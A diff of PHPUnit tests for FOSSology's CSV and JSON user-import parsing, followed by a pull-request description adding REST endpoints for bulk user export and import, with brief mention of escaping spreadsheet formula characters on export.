+   * -# Test UserController::parseUsersCsv() with a quoted field containing
+   *    an embedded newline (fgetcsv() consumes 2 physical lines for that
+   *    one logical row)
+   * -# Check that the next row's _csvLineNumber still matches its true
+   *    physical line, not just "previous row's line + 1"
+   */
+  public function testParseUsersCsvLineNumberAccountsForEmbeddedNewlines()
+  {
+    $csv = "name,description,email\n" .
+      "alice,\"Line1\nLine2\",alice@example.com\n" .
+      "bob,short,bob@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersCsv', [$path, ',', '"']);
+
+    $this->assertCount(2, $rows);
+    $this->assertEquals('alice', $rows[0]['name']);
+    $this->assertEquals(2, $rows[0]['_csvLineNumber']);
+    $this->assertEquals('bob', $rows[1]['name']);
+    $this->assertEquals(4, $rows[1]['_csvLineNumber']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersCsv() with a header containing a
+   *    duplicate column name (e.g. "name" twice)
+   * -# Check that false is returned instead of silently discarding the
+   *    first column's values via array_combine()
+   */
+  public function testParseUsersCsvRejectsDuplicateHeaderColumns()
+  {
+    $csv = "name,email,name\nalice,alice@example.com,bob\n";
+    $path = $this->writeTempFile($csv, '.csv');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersCsv', [$path, ',', '"']);
+
+    $this->assertFalse($rows);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersCsv() with a "userPass" column
+   * -# Check that it is captured into the DTO like any other field
+   */
+  public function testParseUsersCsvCapturesUserPass()
+  {
+    $csv = "name,userPass\nalice,Secret123!\n";
+    $path = $this->writeTempFile($csv, '.csv');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersCsv', [$path, ',', '"']);
+
+    $this->assertEquals('Secret123!', $rows[0]['userPass']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersCsv() with an unreadable file path
+   * -# Check that false is returned instead of erroring
+   */
+  public function testParseUsersCsvUnreadableFile()
+  {
+    $rows = $this->invokePrivate($this->userController, 'parseUsersCsv',
+      ['/nonexistent/path/does-not-exist.csv', ',', '"']);
+    $this->assertFalse($rows);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersJson() with a plain JSON array of users
+   */
+  public function testParseUsersJsonList()
+  {
+    $path = $this->writeTempFile(json_encode([
+      ['name' => 'alice', 'agents' => ['mime' => true]],
+      ['name' => 'bob'],
+    ]), '.json');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersJson', [$path]);
+
+    $this->assertCount(2, $rows);
+    $this->assertEquals('alice', $rows[0]['name']);
+    $this->assertTrue($rows[0]['agents']['mime']);
+    $this->assertEquals('bob', $rows[1]['name']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersJson() with a single user object (not
+   *    wrapped in an array)
+   */
+  public function testParseUsersJsonSingleObject()
+  {
+    $path = $this->writeTempFile(
+      json_encode(['name' => 'alice', 'email' => 'alice@example.com']), '.json');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersJson', [$path]);
+
+    $this->assertCount(1, $rows);
+    $this->assertEquals('alice', $rows[0]['name']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersJson() with a single user object that
+   *    is missing "name"
+   * -# Check that it is still wrapped as one row (detected by shape, not
+   *    by the presence of "name") instead of being misread as a bag of
+   *    scalar values and silently producing zero rows
+   */
+  public function testParseUsersJsonSingleObjectWithoutName()
+  {
+    $path = $this->writeTempFile(
+      json_encode(['email' => 'x@example.com']), '.json');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersJson', [$path]);
+
+    $this->assertCount(1, $rows);
+    $this->assertEquals('', $rows[0]['name']);
+    $this->assertEquals('x@example.com', $rows[0]['email']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersJson() with a "userPass" field
+   * -# Check that it is captured into the DTO like any other field
+   */
+  public function testParseUsersJsonCapturesUserPass()
+  {
+    $path = $this->writeTempFile(
+      json_encode(['name' => 'alice', 'userPass' => 'Secret123!']), '.json');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersJson', [$path]);
+
+    $this->assertEquals('Secret123!', $rows[0]['userPass']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersJson() with the {"users": [...]}
+   *    wrapper produced by the JSON export
+   */
+  public function testParseUsersJsonWrapped()
+  {
+    $path = $this->writeTempFile(
+      json_encode(['users' => [['name' => 'alice']]]), '.json');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersJson', [$path]);
+
+    $this->assertCount(1, $rows);
+    $this->assertEquals('alice', $rows[0]['name']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersJson() with malformed JSON
+   * -# Check that false is returned instead of erroring
+   */
+  public function testParseUsersJsonMalformed()
+  {
+    $path = $this->writeTempFile('{not valid json', '.json');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersJson', [$path]);
+
+    $this->assertFalse($rows);
   }
 }


### PR DESCRIPTION
<!-- SPDX-FileCopyrightText: © Fossology contributors

     SPDX-License-Identifier: GPL-2.0-only
-->

<!-- Please refer to CONTRIBUTING.md (https://github.com/fossology/fossology/blob/master/CONTRIBUTING.md)
before creating the pull request to make sure you follow all the standards. -->

## Description

Adds the REST v2 endpoints for bulk user import/export via CSV and JSON. FOSSologyUI's Users > Operations page already calls these paths -- they were stubbed as "not exposed" on the backend -- this PR implements them.

### Changes

- Added `GET /users/export-csv` and `GET /users/export-json` -- export all users, including their agent preferences, in a format that round-trips back through import (`agent_*` CSV columns / nested `"agents"` JSON object).
- Added `POST /users/import-csv` and `POST /users/import-json` -- bulk-create users from an uploaded CSV or JSON file. Both share one handler (`handleImportUsers`), dispatching on the uploaded file's extension. Rows are processed independently: one row failing (e.g. duplicate username) doesn't block the rest, and the response summarizes successes/failures per row.
- Extracted `createUser()` and `buildAgentCheckboxes()` out of `addUser()` so the bulk-import path reuses the exact same user-creation logic instead of duplicating it.
- CSV export neutralizes spreadsheet formula injection in free-text fields (`name`/`description`/`email`) by prefixing risky leading characters (`=`, `+`, `-`, `@`) with a single quote.
- CSV import clamps `delimiter`/`enclosure` to a single character before calling `fgetcsv()`, which requires exactly one byte and otherwise throws a `ValueError` on PHP >= 8.1.
- Documented all four endpoints in `openapiv2.yaml`.
- Added unit tests covering the new endpoints: export/import happy paths, admin-only checks, malformed/empty uploads, and CSV/JSON parsing edge cases.

## How to test

1. `composer install --working-dir=src`
2. Run the controller test suite: `phpunit -c src/phpunit.xml --filter UserControllerTest`
3. Or manually, against a running instance, as an admin:
   - `GET /repo/api/v2/users/export-csv` and `/export-json` -- confirms a downloadable file with the correct `Content-Disposition` header and one row per user.
   - `POST /repo/api/v2/users/import-csv` (multipart, field `fileInput`, optional `delimiter`/`enclosure`) and `/import-json`, using a file from the export step above -- confirms the users are recreated with matching agent settings.
   - Repeat either call as a non-admin user -- confirms `403 Forbidden`.

Addresses fossology/FOSSologyUI#428
